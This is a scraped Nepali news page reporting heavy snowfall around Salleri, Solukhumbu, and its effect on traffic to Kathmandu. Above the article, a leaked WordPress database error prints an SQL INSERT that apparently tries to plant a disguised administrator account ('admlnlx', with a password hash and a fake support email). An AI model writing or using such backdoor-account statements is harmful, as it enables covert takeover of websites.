WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQS5K4QxyGx1y.iBB82n0oneMy0vuy0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 01:01:50', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बु जिल्लाको सदरमुकाम सल्लेरी आसपासमा भारी हिमपात भएको छ । मंगलबार रातीदेखि सल्लेरी र आसपासको क्षेत्रमा हिमपात भएको हो ।
सदरमुकाम सल्लेरीसहित पत्ताले, पिके, रातनाङे डाडा क्षेत्रमा व्यापक हिमपात भएको छ । निरन्तर बर्षासगै हिपपातले चिसो बढेको छ । हिमपातका कारण सोलुखुम्बुवाट काठमाण्डौ जाने सवारी साधनहरु प्रभाबित भएको छ ।





फोटो सौजन्या:अमृत कुमार राई